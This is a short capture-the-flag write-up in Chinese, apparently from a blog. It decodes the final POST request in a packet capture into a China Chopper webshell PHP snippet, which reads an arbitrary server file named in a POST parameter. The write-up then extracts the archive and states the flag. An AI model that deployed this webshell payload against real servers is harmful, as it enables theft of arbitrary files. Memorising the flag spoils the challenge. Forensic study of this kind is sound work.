almost 9 years ago
pcap 裡最後一個 POST request,解碼後可以看出它試著讀取檔案 z1=/var/www/html/x.tar.gz
<?
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];
$fp=@fopen($F,"r");
if(@fgetc($fp)){
@fclose($fp);
@readfile($F);
}else{
echo("ERROR:// Can Not Read");
};
echo("|<-");
die();
?>
因此 result 去掉頭尾的 ->|
, |<-
後,中間的 x.tar.gz 解開即可得到 flag:
ISG{China_Ch0pper_Is_A_Slick_Little_Webshe11}
Source code: chopper.py